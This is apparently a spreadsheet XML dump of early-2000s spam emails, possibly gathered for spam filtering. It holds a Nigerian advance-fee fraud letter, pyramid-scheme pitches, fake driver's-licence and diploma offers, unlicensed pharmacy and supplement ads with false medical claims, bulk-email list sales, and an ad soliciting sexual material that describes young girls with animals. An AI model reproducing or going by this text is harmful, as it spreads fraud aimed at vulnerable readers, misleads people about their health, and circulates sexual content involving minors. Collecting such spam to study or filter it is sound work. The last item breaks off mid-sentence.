  <si>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Become your own BossEarn high income as a:*Â  Professional Judicial Judgment Processor*Â  Child Support Processor*Â  Pre-Employment Screening Expert*Â  Business Debt ArbitratorWork from your own home or office, anywhere in the US and Canada.Establish your own hours.Come join our existing associates in making $5000 per month part time and over $15,000 per month full time.Low start up costs.In-depth training and supportTo learn more visit us at:Â Â Â Â Â Â Â  Introducing The Cambridge Family of Business Success Courses Or call us at: 1-281-500-4018Â Â Â  (Customer support staff are available to help you from 7:00AM to 9:00PM, 7 days a week Central time.Â  No obligation or pressure. They will answer your questions and letÂ  you make your own informed decision on whether you want to join us or not.This ad is produced and communicated by:
UAS, To be excluded from our ads email us at 
mp3@alarmists.com or write us at:
UAS , P O B 1 2 0 0, O r a n g e s t a d, A r u b a
TO48 6-8 C3 P{%RAND%}
/3/
)(*-*-*-*-*-*-*-*-*-R E M I N D E R-*-*-*-*-*-*-*-*-*-*)(
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Incredible Opportunity / Fire Your Boss! / Work from home
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
This Is Real, MAKE MONEY
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
3 = =  Judicial Judgment  = = 3three million is that enough for you? will give you more....
/3/Just visit the site and learn the advantages . . ..-3-
</t>
  </si>
  <si>
    <t xml:space="preserve">FROM THE DESK OF: Dr tom eke.
E-Mail:dr_tomeke@spinfinder.com
LAGOS -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e-mail,which is
quicker and also
to enable us meet up with the second quater payment
for the year
2000. However, let me start by introducing myself properly
to you. I
am Dr.tom eke, a Director General in the Department
Of Petroleum 
Resources(D.P.R)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D.P.R e.t.c. In order to commence this
business we
solicit for your assistance to enable us transfer
into your Account
the said funds. The source of this funds is as
follows: In the second
quarter of 2001 this committee was mandated to
review and award
contracts to the tune of US$400 million US dollars
to a group of five
firms for the supply construction and installation
of Oil Pipe lines
in Warri and Port Harcourt. During this process my
colleagues and I
decided and agreed among ourselves to deliberately
over-inflate the
total contract sum from US$400 million to US$431
million United
States dollars with the main intention of sharing
the remaining sum
of US$31 miilion amongst ourselves. The Federal Government of Nigeria has since the
second quater of	
year 2001 approved the sum of US$431 million for us
as the contract sum, 
and the sum of US$400 million has also been paid to
the foreign companies 
concerned as contract entitlements for the various
contracts done, but 
since the companies are entiltled to US$400 million
dollars only, we are 
now left with US$31 million dollars balance in the
account which we intend to
disburse amongst ourselves, but by virtue of our
positions as civil
servants and members of this panel, we cannot do
this by ourselves,
as we are prohibited by the Code of Conduct Bureau
(Civil Service
Laws) from opening and/or operating foreign accounts
in our names
while still in Government service, making it
impossible for us to
acquire the money in our names right now. I have
therefore, been
delegated as a matter of trust and urgency by my
colleagues in the
panel to look for an overseas partner into whose
account we would
transfer the sum of US$31 million. Hence we are
writing you this
letter. My Colleagues and I have agreed that if you
or your company
can act as the beneficiary of this funds on our
behalf, you or your
Company will retain 20% of the total amount (US$31
million), while
70% will be for us(OFFICIALS) and the remaining 10%
will be used in
offsetting all debts/expenses and Taxes incurred
both local and
foreign in the cause of this transfer. Needless to
say, the trust
reposed on you at this juncture is enormous. In
return we demand your
complete honesty and trust. You must however NOTE that this transaction will be
strictly based 
on the following terms and conditions as we have
stated below; 
a) Our conviction of your transparent honesty and
diligence 
b) That you would treat this transaction with utmost
secrecy and confidentiality 
c) That you will not ask for more share or try to
sit on the funds once it is under
your custody, or any form of blackmail. 
d) That upon receipt of the funds you will release
the funds as instructed 
by us after you have removed your share of 20% from
the total amount. 
Please, note that this transaction is 100% legal and
risk free and we hope to conclude
this transaction seven to fourteen bank working days
from the date 
of receipt of the necessary requirements from you .
We are looking 
forward to doing business with you and solicit your
Total Confidentiality
in this transaction. There is no cause for alarm. I
give you my word that you
are completely safe in doing business with us.
Transactions like this
have been successfully carried out in the past by
most Government
executives. Here in my country there is great
economic and political
disarray and thus looting and corruption is rampant
and the order of
the day, thus explaining why you might have heard
stories of how
money is been taken out of Nigeria, this is because
everyone is
making desperate attempts to secure his or her
future, so that when
we retire from active service we donot languish in
poverty. I will
explain more to you when I have heard from you. Please acknowledge the receipt of this letter using
the above e-mail address. 
I will bring you into the complete picture of this
pending business
transaction when I have heard from you and also
receive your
confidential telephone and fax numbers to enable me
fax to you all
necessary information you need to know about our
pending business
transaction. I will also send to you my private
telephone and fax
numbers where you can always reach me. Your urgent
response will be
highly appreciated to enable us transfer the funds
under the second
quarter of the year 2002. Thank you and God Bless. Yours faithfully, Dr.tom eke. N.B. PLEASE BE INFORMED THAT THIS BUSINESS
TRANSACTION IS 100% LEGAL
AND COMPLETELY FREE FROM DRUG MONEY OR MONEY
LAUNDERING. THIS IS A
COMPLETE LEGITIMATE BUSINESS TRANSACTION. 
-- 
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from PalmGear.com!Developers,PalmGear.com is currently offering a 15% discount on all Advertising through the end of June! The cost have been dropped and discounts will be given if you would like to trade for Past Due Payment or if you pre-pay for the advertising. Please contact me if you have any questions or if you would like to get signed up!Below are the options and cost to advertise!Regards,Jake Divjak
www.PalmGear.com
jaked@palmgear.com
Phone-817-271-9807 
Web Banner Ads-All ad prices are based on 3 Month minimums, prepaid.Home page ads will be rotated with no more than 10 advertisers at one time.
Software Search, Top 50 Monthly, Top 50 Downloads, The Essentials and Gearï¿½s
Choice and all software categories will be rotated with no more than 3
advertisers at one time.Pricing is defined as follows, depending upon your association with
PalmGear.com and the URL that you will direct customers to.
Pricing ï¿½ per month
Homepage (10 Advertisers Max) ï¿½ $1000
Left Colum Badge Homepage $2000
Homepage Product Images (3 rows, 4 images per row)PRICES VARY
Top 50 (3 Advertisers Max) ï¿½ $300
Top 50 Monthly (3 Advertisers Max) ï¿½ $300
Essentials (3 Advertisers Max) ï¿½$300
Gearï¿½s Choice (3 Advertisers Max) ï¿½$300
My PalmGear (3 Advertisers Max) ï¿½ $200
Developers (3 Advertisers Max) ï¿½ $200
Software Category Pages (3 Advertisers Max) ï¿½ Cost and varies depending upon
category
Tips and Tricks (3 Advertisers Max) ï¿½ $200
Related Links (3 Advertisers Max) ï¿½ $200Advertisements for product(s) that are sold by PalmGear.com with the ad
directing customers to your product description page on PalmGear.com.
receive these discounts.Ad Payment &amp; Placement
Payment for all advertising must be made prior to placement and may be made
either via check or credit card.Ad Specifications
Top Banners - 468 x 60
12K File Size maximumWe currently will only accept Graphic Banner Ads, no forms, etc.Graphic files must be stored on our servers. All advertising will be taxed
for this reason.Statistics
Each advertiser can log in through the developer section, with their user
name and password and the statistics for their banners will be viewable
there.----------------------------------------------------------------------------My PalmGear Subscriber E-Mail BlastPricing ï¿½
$1000 ï¿½ Currently at aprox. 115,000 UsersHow it works ï¿½
With this advertising option, you can effectively reach all of the My
PalmGear Subscribers that have requested new information and updates to be
e-mailed to them. The process is as followsE-mail Blasts are sent out on the 15th of every month. These can be reserved
in advance on a first-come, first-serve basis.All text will be sent to PalmGear.com for approval and then on the assigned
day will be e-mailed to the My PalmGear Subscribers that have requested
this.----------------------------------------------------------------------------Product Confirmation E-Mail BlurbPricing ï¿½
$1000 ï¿½ Currently sending out aprox. 65,000How it works ï¿½
For each individual software product that is ordered, a confirmation is
e-mailed to the customer that details the information about that order. At
the bottom of each e-mail, there is a space available for advertisers to put
a short message about their product, company, etc. The process for this is
as follows.Product Confirmation E-Mails are sent out with every software order
registration. A company can reserve this option for a months period at a
time. They will have exclusive right to that space for that month. Months
can be reserved in advance on a first-come, first-serve basis.All text will be sent to PalmGear.com for approval and then on the first day
of the month, that information will be attached to those e-mails.----------------------------------------------------------------------------Shipping InsertPricing ï¿½
$0.10 per insertion ï¿½ Currently sending out aprox 6000 per monthHow it works ï¿½
For each order that is placed for shipped products, a shipping invoice is
inserted into the shipment. There is the opportunity to include a preprinted
insert into each of these. They would need to reference that the item(s) can
be purchased at PalmGear. The advertiser is responsible for printing costs.
(Only 2 per shipment)Regards,,
PalmGear.com 
http://www.palmgear.com
"The One Stop Source for your Palm OS Based Organizer!"and Handspring Visor Modules too at http://www.palmgear.com/hs !
</t>
  </si>
  <si>
    <t xml:space="preserve">
New Page 1Reach the Masses
Direct E-Mail
Advertising
The Bulk E-Mail
ExpertsIf we can
reach you, You can reach them!500,000................................$399 US
1,000,000.............................$699 US
volume discounts available
Â For More Info or to place an order,
  please leave
  your name, telephone number andÂ  best time to call.
PLEASE CLICK HEREÂ 
Â 
Â 
Â 
Â 
To be removed from further mailings, PLEASE
CLICK HERE
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">Nasty Farm Girls!Hey Baby,
Are 
                you a sick Fuck??? Do you like watching
little 
                girls FUCKING with their animals??? 
                That's what we thought! We know what you want! This 
                shit has been banned in ALL 50 
                States, and Canada! But we are bringing it too you via a
special 
                offer! Wanna watch these nasty 
                farm girls with their animals? Then you have to check 
                this nasty shit out! It is a 
                must see!
XoXoXoXoXo
Cassie
P.S. 
                If you really wanna watch these girls fuck around with their farm 
                animals click
here 
                now!TOTALLY 
                FUCKED UP FARM GIRL LOVING! NASTY SHIT THAT IS GROSS!To 
          Be purged from all future mailings please click below:
CLICK 
          HERE!
</t>
  </si>
  <si>
    <t xml:space="preserve">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25% or more!
Certified Natural Laboratories is pleased to introduce the
latest addition to their widely acclaimed line of herbal
supplements: Maxamanâ„¢.
Specially formulated with herbs and extracts from around
the globe, Maxamanâ„¢ can help to enhance sexual sensitivity,
increase sexual stamina, and actually increase the size of your
penis by up to 25%. The special blend of herbs in Maxamanâ„¢
have been shown to boost blood flow to the penis, thus expanding
the sponge-like erectile tissue in the penis, leading to size gains
in both length and thickness.
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
What To
Expect:
1-2 weeks
 Most men notice more powerful and longer lasting erections almost
immediately. A noticeable increase in thickness is also
common.3-8 weeks
 By this point you should be able to notice an increase in
thickness in both erect and flaccid states, as well as an overall
increase in length.9 weeks +
 After nine weeks, your penis should be noticeably larger in both
length and girth.
Â 
Below is a comparison chart compiled from the most recent
data on penis size. See how you measure up...
How to measure your penis size
correctly: To determine length, measure the erect penis
from the base of the penis where the top of the shaft meets the
pubic area (the peno-pubic junction) to the tip of the head. For
uncircumcised men the foreskin should be retracted. To determine
width, measure at mid-shaft around the circumference while the
penis is erect.Whether you have a small, average or large penis, it is now
possible for you to increase the size of your penis by up to 25%
without resorting to dangerous surgery or cumbersome
weights.
The
all-natural proprietary blend of unique herbs found in Maxaman is
designed to restore blood flow, unleash stored testosterone, and
heighten sensation by activating the body's natural hormone
production and supplying vital nutrients necessary for peak sexual
performance. All of the ingredients in Maxaman are stringently
scrutinized, and are guaranteed to be of the highest pharmaceutical
grade.1. How does Maxaman
work?
 The all
natural proprietary blend of unique ingredients found in Maxaman is
designed to restore blood flow, unleash stored testosterone, and
heighten sensation by activating the body's natural hormone
production and supplying vital nutrients necessary for peak sexual
performance. The special blend of herbs in Maxaman have been shown
to boost blood flow to the penis, thus expanding the sponge-like
erectile tissue in the penis, leading to size gains in both length
and thickness.
2. Is Maxaman
safe?
 Because
Maxaman is an all natural nutritional supplement containing only
the finest botanicals, there are no harmful side effects when taken
as directed. Maxaman is not a pharmaceutical drug and contains none
of the synthetic chemicals found in prescription medications. It is
a safe alternative to dangerous surgery.
3. What
can Maxaman do for me?Common benefits
from using Maxaman include:
 Up to a 25% increase in penis length and thickness
 Increased stamina
 Improved sexual desire
 Stronger, more powerful erections
 Greater control over ejaculation
 Stronger climaxes and orgasms
4. Will
I experience any side effects?
 There
are no harmful side effects when taken as directed.
5. What ingredients are used in
Maxaman?
 Maxaman is all natural, and made from the finest quality
botanicals available. To read more about each of these key
ingredients, please read below for all the details.
6. How
should I use Maxaman?
The normal
dosage of Maxaman is two capsules with a meal and a glass of water.
The cumulative effects of Maxaman increase with each dosage, making
it even more effective with continued use. Do not exceed six
capsules daily.
7. Do I
need a prescription to use Maxaman?
No you do not.
Because Maxaman is an all natural nutritional supplement containing
only the finest botanicals, there is no need to obtain a
prescription.
8. How
does Maxaman differ from other penis lengthening
procedures?
Maxaman is not
a pharmaceutical drug and contains none of the synthetic chemicals
found in prescription medications. It is an all natural formula
designed to boost blood flow to the penis, thus expanding the
sponge-like erectile tissue in the penis, leading to size gains in
both length and thickness. Maxaman provides men with a safe and
natural alternative to potentially dangerous
surgery.
9. How
long will it take to get my order?
Shipped the same day payment is received in most
cases..
10. Is it really safe to order
online?
Absolutely!
All information about your order is encrypted, and cannot be viewed
by anyone else. Ordering online using this state-of-the-art
processing system is actually much safer than using your credit
card in a restaurant or at the mall.
11. Is
Maxaman shipped discreetly?
Yes it is!
Maxaman is sent in an unmarked box with no indication whatsoever as
to what is contained inside.
11. How
much is shipping and handling?
$6.95 for the 1st. bottle and free for any
order more than 1 bottle.
Â 
The special
blend of herbs in Maxamanâ„¢ have been shown to boost
blood flow to the penis, thus expanding the sponge-like erectile
tissue in the penis, leading to size gains in both length and
thickness.
 Â 
The proprietary blend of herbs
found in Maxamanâ„¢ consists of:Zinc (as zinc oxide) - This essential mineral is required for
protein synthesis and collagen formation. Sufficient intake and
absorption of zinc are needed to maintain a proper concentration of
Vitamin E.Yohimbe - Used traditionally to treat impotence and frigidity,
Yohimbe helps to increase blood flow and sensitivity of nerves,
especially in the pelvic region. It is commonly used as an
aphrodisiac to stimulate sexual organs and improve central nervous
system function.Maca - Maca is an adaptogen. It works to create harmony in the
body, regulating levels of hormones and enzymes to create a state
of homeostasis.Catuaba - Native to Brazil and parts of the Amazon, Catuaba is
a central nervous system stimulant commonly used throughout the
world for treating sexual impotence, exhaustion and fatigue.Muira Puama - A South American herb, Muira Puama has been
used to treat impotence for hundreds of years. It is highly sought
after for its strong stimulant qualities.Oyster Meat - Historically
known as an aphrodisiac, oyster meat contains flavonoids that have
been shown to stimulate the reproductive system.L-Arginine - L-Arginine
is an amino acid which helps to create nitric oxide in the human
body. Nitric oxide is the most essential substance influencing
sexual function in both men and women. Nitric oxide promotes
circulation, resulting in improved blood flow.
 Â Oatstraw - Used to
treat fatigue and exhaustion, Oatstraw improves brain and nervous
system function and has been used to treat impotence. It is
extremely useful for aiding your body in recovering from
exhaustion, as well as correcting sexual debility.Nettle Leaf - Acts as a
diuretic, expectorant and tonic. It is rich in iron and chlorophyll
to clean and nourish the blood.
Cayenne - Cayenne improves
circulation, increases the metabolic rate and acts as a catalyst
for other herbs.
Pumpkin Seed - Pumpkin seed is
commonly used to strengthen the prostate gland and promote male
hormone function. Myosin, an amino acid found in pumpkin seeds, is
known to be essential for muscular contractions.Sarsaparilla - Found along
the coast of Peru, Sarsaparilla aids in the production of
testosterone and progesterone.Orchic Substance - This is an
extract from bovine testes, and is proven to increase testosterone
levels without harmful steroids.Licorice Root - Licorice root fights inflammation, as well as
viral, bacterial and parasitic infection. Licorice cleanses the
colon, and enhances microcirculation in the gastrointestinal
lining.Tribulus - A natural testosterone enhancer, Tribulus can
improve desire and performance and increase sexual energy. Tribulus
is also an excellent circulatory and heart tonic and can help
dilate arteries. In India it is used as a tonic for the urinary
system.Ginseng Blend (Siberian, American &amp; Korean) - Commonly used by athletes for overall body strengthening,
Ginseng fortifies the adrenal gland, and promotes healthy
circulation. It increases the conversion rate of sugars into the
necessary substrates for the formation of fatty acids in the liver.
Ginseng stimulates the central nervous system, and is a quick
antidote for fatigue.
Astragalus - Regarded as a potent
tonic for increasing energy levels and stimulating the immune
system, Astragalus has also been employed effectively as a
diuretic.Boron
- Boron helps to prevent the loss of calcium, phosphorus and
magnesium through the urine.
 Â ORDER NOW!Afraid its not for you? Don't worry we offer a LIFETIME
Guarantee! If your not ecstatic with our product, just return the
unused portion for a FULL Refund!! No questions will be
asked!
Thank you for your time and I hope to hear from you
soon!6828GXPG8-954AFsK4542FFOO2-493vwtv1743VTLq4-l41
</t>
  </si>
  <si>
    <t>*****************BANNEDCD::::::::::::::::::::::::::::::::::&gt;NET******************I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http://%77%77%77%2E%62a%6E%6E%65%64c%64%2E%6E%65%74{%RAND%}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</si>
  <si>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 xml:space="preserve">" 
Content-Type: text/plain; charset="us-ascii";format=flowed
Content-Transfer-Encoding: 7bit
Subject: [SA] Drive everywhere
Sender: spamassassin-sightings-admin@example.sourceforge.net
Errors-To: spamassassin-sightings-admin@example.sourceforge.net
X-BeenThere: spamassassin-sightings@example.sourceforge.net
X-Mailman-Version: 2.0.9-sf.net
Precedence: bulk
List-Help: 
List-Post: 
List-Subscribe: ,
List-Id: 
List-Unsubscribe: ,
List-Archive: 
X-Original-Date: Mon, 10 Jun 2002 09:36:57 +0900
Date: Mon, 10 Jun 2002 09:36:57 +0900INTERNATIONAL DRIVER'S LICENSENeed a new driver's license?Too many points or other trouble?Want a license that can never be suspended
or revoked?Want an ID for nightclubs or hotel check-in?Avoid tickets, fines, and mandatory driver's
education.Protect your privacy, and hide your identity.The United Nations gave you the privilege to
drive freely throughout the world! (Convention
on International Road Traffic of September 19,
1949 &amp; World Court Decision, The Hague,
Netherlands, January 21, 1958)Take advantage of your rights. Order a valid
International Driver's License that can never
be suspended or revoked.Confidentiality assured.CALL NOW!!!1-770-908-3949 We await your call seven days a week, 24 hours a day,
including Sundays and holidays.
spel
_______________________________________________________________Don't miss the 2002 Sprint PCS Application Developer's Conference
August 25-28 in Las Vegas - http://devcon.sprintpcs.com/adp/index.cfm?source=osdntextlink_______________________________________________
Spamassassin-Sightings mailing list
Spamassassin-Sightings@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-sightings
</t>
  </si>
  <si>
    <t xml:space="preserve">Come claim your 2 free signups.  We will give
you 2 free signups and then put 2 under both
of them, so on and so forth!  We will in essence 
build your downline for you!  See the write-up 
in the USA Today on this program (Friday Edition)To sign up for free click the link below:
mailto:trippleplay43@excite.com?subject=2_free_signupsThe national attention drawn to this program by
the media will drive this program with incredible
momentum! Don't wait, if you wait, you loose people. 
This is building incredibly fast!  To claim your 2
FREE signups and reserve your position, click here
mailto:trippleplay43@excite.com?subject=2_free_signupsThis program is putting GOLD COINS into peoples
hands in record speed, don't wait!All the best,Gold Coin Distribution
1-800-242-0363, Mailbox 1993______________________________________________________
To be removed from our database, please click below:
mailto:nogold4me666@excite.com?subject=remove  </t>
  </si>
  <si>
    <t xml:space="preserve">The 
          World's #1 On-line Pharmacy
Order 
          from the convenience of your home!
We Offer The Widest Range Of Prescription 
          Drugs Available Through Online Ordering...
Phentermine 
          (Weight-Loss) 
          Celebrex (Pain-Relief)
          Valtrex (Treatement for Herpes)
          Meridia (Weight-Loss)
          Xenical (Weight-Loss
Viagra (Sexual)
Phentermine 
          (Weight-loss)
Zyban (Stop 
          Smoking)
Plus Many 
          Other Prescription Drugs!
Click 
          Here to take you to the site
**No 
          Embarrassment, Just FAST, DISCRETE Delivery!**Enjoy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Needs!This email was sent to you because your email is part of a targeted opt-in list. If you do not wish to receive further mailings from this offer, please click below and enter 
your email to remove your email from future offers.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****************************************************************Do Not Reply To This Message To Be RemovedEasy Remove and contact: HERE
</t>
  </si>
  <si>
    <t xml:space="preserve">
We want to help you get lower HOUSE payments, with no hassleClickTo stop recieving this, remove from our link on the site.56281814119876554443333
</t>
  </si>
  <si>
    <t xml:space="preserve">Adult Club FREE VIP Membership jm@netnoteinc.com
16 Adult Sites For Life
8 New Sites added todayÂ… 
You now have access to 16 of the best adult sites on the internet.HOT OF THE PRESS NEWS!!!Â  With just over 2.1 Million Members that signed up for FREE, Last month there were 629,947 New Members. Are you one of them yet???
Step 1.Â  Read our Q and A...
Q. Why are you offering free access toÂ 16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16 membership sites?
A. No just one to get access to all of them. Q. How do I get started? 
A. Click on one of the following links below to become a member.
Step 2. Pick A Site
Â you only need to sign-up for 1 to access sites
# 16 New &gt; Adults Farm# 15 New &gt; Play House Porn# 14 New &gt; Asian Sex Fantasies# 13 New &gt; Lesbian Lace# 12 New &gt; Tits Patrol# 11 New &gt; Sinful Cherries# 10 New &gt; Hot Stripper Sluts# 9 New &gt; Sexy Celebes
# 8 &gt; I WANT A TEEN QUEEN
# 7 &gt; BARLEY LEGAL TEENS
# 6 &gt; KINKY FARM
# 5 &gt; WILD ASIAN BABES
# 4 &gt; COLLEGE BAD GIRLS
# 3 &gt; HOT WET MODELS
# 2 &gt; BOOB RANCH
# 1 &gt; HOLLYWOOD SLUTSnew and free!! 
FREE TEEN HARDCORE CLICK HERE!
new and free!! 
FREE TEEN HARDCORE CLICK HERE!
Â 
Â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http://209.203.174.6/opting-out.php . Please allow 24Â  hours for removal.This e-mail is sent in compliance with the Information Exchange
Promotion and Privacy Protection Act. section 50 marked as
'Advertisement' with valid 'removal' instruction.suyjiswyhhlagomhr
</t>
  </si>
  <si>
    <t xml:space="preserve">Astounding
New Software Lets You Find
Out Almost Anything About Anyone
Click here to download it right
now (no charge card needed):
Download
Page
(This
make take a few moments to load - please be patient)Find out everything you ever wanted to know about:your friends
your family
your enemies
your employees
yourself - Is Someone Using Your Identity?
even your boss!Did you know that you can search for
anyone, anytime, anywhere, right on the Internet?
Click here: Download
PageThis mammoth collection of Internet investigative tools &amp; research
sites will provide you with nearly 400 gigantic research resources
to locate information online and offline on:people you trust, people you work with
screen new tenants, roommates, nannys, housekeepers
current or past employment
license plate numbers, court records, even your FBI file
unlisted &amp; reverse phone number lookupClick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out--you may be shocked at what you find!!
These
are only a few things
that you can do with this software...
To download this software, and have it in less than 5 minutes, click &amp; visit our website:Click
here: Download
PageWe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:)[Click
Here to Stop Further Messages]Thank you! CopyrightÂ Â© 2002, all rights reserved. [TG0BK5N]
</t>
  </si>
  <si>
    <t xml:space="preserve">I saw your email on a website I visited yesterday, and thought
you might be interested in this. A few months back I joined a program and then...promptly forgot
about it. You may have done this yourself sometime...you intend
to work the program but then get caught in your day-to-day
activities and it's soon forgotten.The program was free to join so maybe I just didn't take it very
seriously.Anyway, near the end of May I received a letter from my
sponsor (Vic Patalano) informing me that I had more than 2000
PAID members in my downline!As you can imagine, I was very skeptical. After all, how could I
have more than 2000 paid members under me in a program that I had
never promoted?I took the time to check out the site...then wrote to Vic asking
for confirmation that these were paid members and not just free
sign-ups...like me :)Well, it was true...I had 2365 paid members in my downline. This
in a program that I had never worked!All I had to do was upgrade to a paid membership before the end
of the month and I would have my position locked in and a
downline of 2365 people.You can bet I wasted no time in getting my membership upgraded!I can tell you, if I had known what was happening with this
program, I would have become an active paid member months ago!With this program, you will get a HUGE downline of PAID MEMBERS.
My sponsor's check, which is a minimum of $5,000, arrives every
month...on time.How would you like to lock your position in FREE while you check
out this opportunity and watch your downline grow?To grab a FREE ID#, simply reply to:gitrman@excite.com
and write this phrase:
"Email me details about the club's business and consumer opportunities"
Be sure to include your:
1. First name
2. Last name
3. Email address (if different from above)We will confirm your position and send you a special report
as soon as possible, and also Your Free Member Number.I'll get you entered and let you know how you can
keep track of your growing downline.That's all there's to it.I'll then send you info, and you can make up your own mind.Warm regards,Bruce StevensP.S. After having several negative experiences with network
marketing companies I had pretty much given up on them.
This company is different--it offers value, integrity, and a
REAL opportunity to have your own home-based business...
and finally make real money on the internet.Don't pass this up..you can sign up and test-drive the
program for FREE. All you need to do is get your free
membership.
0754quAQ5-965nKuK1727EMl22
</t>
  </si>
  <si>
    <t xml:space="preserve">
MarketingonTarget.com has teamed up 
                  with FoundMoney to help you locate and claim your lost CASH.
                  The amount on that check, OR MORE, literally be YOURS for 
                  the claiming. 
                  Â  This is not a contest or a promotion. FoundMoney is a search service dedicated to putting 
                  UNCLAIMED MONEY together with its rightful 
                owners.
There are 31 
                  million North American people eligible right now to claim unknown 
                  cash windfalls. The search is Fast, Easy and GAURANTEEDÂ Over  BILLION is 
                  sitting in our database alone, which contains bank and government accounts, wills and estates, insurance settlements etc.Since 1994, our Web site 
                  has reunited millions upon millions of dollars with thousands 
                  of rightful owners -- who didn't even knowÂ  they 
                  had money waiting for them.Â 
Click here 
                  NOW or on the link below to find out -- in seconds -- if there 
                  is money waiting to be claimed in your family name or that of 
                  somebody you know. The INITIAL SEARCH IS 
FREE.
YOU HAVE NOTHING 
                  TO LOSE ....Â TRY 
                  FOUNDMONEY TODAYÂ 
CLICK HERE NOW!
Sincerely,ConsumerPackage.com &amp; 
                  FoundmoneyÂ 
Â 
You received this email because you signed up at one of Consumer Media's websites or you signed up with a party that has contracted with Consumer Media. To unsubscribe from our email newsletter, please visit http://opt-out.consumerpackage.net/?e=jm@netnoteinc.com. 
</t>
  </si>
  <si>
    <t xml:space="preserve">
You are receiving this email because you registered to receive
special 
offers from one of our marketing partners&lt;!--
			span.bug { color: black; font-size: 9px; line-height: 9px; font-family:
Arial, Helvetica, sans-serif }--&gt;
The power of Email MarketingEmail Marketing is spreadingÂ around the
wholeÂ world           
  because of itsÂ high effectiveness,Â          
  speedÂ andÂ low cost.          
  Now if you want to introduce and sell your product or service,Â 
look for           
  aÂ partner toÂ raise           
  your website's reputation. The best way would be for
youÂ toÂ useÂ email           
  to contact your
  targeted customer (of course,first,Â youÂ have toÂ know
their email addresses). 
Targeted Email is no doubt veryÂ 
effective.Â            
  If you can introduce your product or serviceÂ           
  throughÂ email directly to the customersÂ who are
interestedÂ in           
  them,Â Â  this willÂ  bringÂ yourÂ          
  businessÂ aÂ better chanceÂ of success.Â XinLanÂ  InternetÂ  MarketingÂ 
Center,Â  hasÂ  many years ofÂ  experience in
developingÂ andÂ           
utilizingÂ internet resources.We have setÂ upÂ globalÂ 
businessÂ            
email-addressÂ databasesÂ            
whichÂ contain Â millionsÂ of email addresses of
commercialÂ            
enterprisesÂ  and consumersÂ           
all over the world. TheseÂ emails are sorted byÂ countriesÂ   
andÂ  fields. WeÂ also continuo-          
uslyÂ  update Â ourÂ  databases,Â Â  addÂ 
newÂ            
addressesÂ  andÂ Â  remove Â undeliverableÂ 
andÂ           
unsubscribed addresses.
With the co-operation with our
partners,Â  we           
can supplyÂ valid targeted emailÂ addressesÂ           
according Â toÂ  yourÂ  requirements,Â  byÂ 
whichÂ  youÂ canÂ            
easilyÂ  and Â directly Â contactÂ yourÂ           
potentialÂ customers.With our help many enterprises and
individualsÂ haveÂ greatly           
raised           
theÂ fame of theirÂ products or service and found many potential  
customers.
We also supplyÂ aÂ  wide varietyÂ of software.Â  For
example,           
Wcast,Â  the software forÂ fast-          
sending emails:this software is a powerfulÂ     
InternetÂ  email-marketingÂ  applicationÂ  which           
is perfect for individuals or businesses to sendÂ multiple customized 
email messages to          
their customers.
We are pleased toÂ offer youÂ our best prices :
Â Â Â Â Â Â Â Â Â            
          EmailsÂ  orÂ  SoftwareÂ Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â Â Â Â Â         
          Remarks
Â Â Â            
          Price
30,000
targeted           
          email addressesÂ We are able to supply valid targeted email
addresses           
          according to your requirements,which are only compiled on your
order,           
          such as region / country / occupation / field / Domain Name
(such as AOL.com or MSN.com) etc.Â            
          USD 30.00Â 
Â Â Â Â            
          Classified email addresses
          Our database contains more than 1600 sorts of email
addresses,and can           
          meetÂ your mostÂ stringent demands.
Â Â 
Â Â Â          
          8 million email addresses
          8 million global commercial enterprise email addresses
Â USD         
          240.00Â 
Â Â Â Â Â Â Â          
          Wcast softwareÂ 
          Software for fast-sending emails. This program can         
        send mailÂ at         
          the rate of over 10,000 emails per hour,         
        and release informationÂ to         
          thousands of people in a         
        shortÂ  time.
Â          
          USD 39.00Â 
Â Â Â Â Â Â          
          Email searcher softwareÂ 
Software
for         
          searching targeted email addresses.Â          
          USD 98.00Â 
Â Â Â Â Â Â Â          
          Global Trade
Poster
          Spread information about your business and your products to over
1500         
          trade message boards and newsgroups.
Â USD         
          135.00Â 
Â Â Â Â Â Â          
          Jet-Hits Plus 2000 ProÂ 
          Software for submitting website to 8000+Â  search
engines.
Â         
          USD 79.00Â        
You mayÂ order the email listsÂ orÂ software directly from our
website. ForÂ  further details,    
pleaseÂ refer to our website.
We will beÂ  honouredÂ  if you are interestedÂ  in our
services or        
software. Please do not        
hesitate to contact usÂ with any queries or concern you may
have.Â  WeÂ will        
beÂ happy toÂ        
serve you.       
Best regards!
Â Â Â Â Â Â Â Â Â Â Â Â   
Â Â Â Â Â Â Â K. Peng       
Marketing Manager
XinLancenter@163.comHttp://Emaildata.51software.net     
XinLan Internet Marketing CenterYou are receiving this email because you   
registered to receive special offers from one of our marketingÂ   
partners.If you would prefer not to receive future emails, Â please       
click here toÂ  unsubscribe 
, or send a       
blank e-mail toÂ  Emailcentre@up369.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, jm@netexplorer.comAs seen on NBC, CBS, and CNN, and even Oprah!  The health
discovery that actually reverses aging while burning fat,
without dieting or exercise!  This proven discovery has even
been reported on by the New England Journal of Medicine.
Forget aging and dieting forever!  And it's Guaranteed!* Reduce body fat and build lean muscle WITHOUT EXERCISE!
* Enhace sexual performance
* Remove wrinkles and cellulite
* Lower blood pressure and improve cholesterol profile
* Improve sleep, vision and memory
* Restore hair color and growth
* Strengthen the immune system
* Increase energy and cardiac output
* Turn back your body's biological time clock 10-20 years
in 6 months of usage !!!
FOR FREE INFORMATION AND GET FREE 
1 MONTH SUPPLY OF HGH CLICK HERE
You are receiving this email as a subscriber
to the Opt-In America Mailing List. 
To remove yourself from all related maillists,
just  
Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">
A.yellow:link {text-decoration: none; color: #FFF200}
A.yellow:visited {text-decoration: none; color: #FFF200}
A.yellow:active {text-decoration: none; color: #EFEFC8}
A.yellow:hover {text-decoration: none; color: #FFFFFF}
. 
              U N I V E R S I T Y . D I P L O M A S .Do 
                you want for a prosperous future, increased money earning power, 
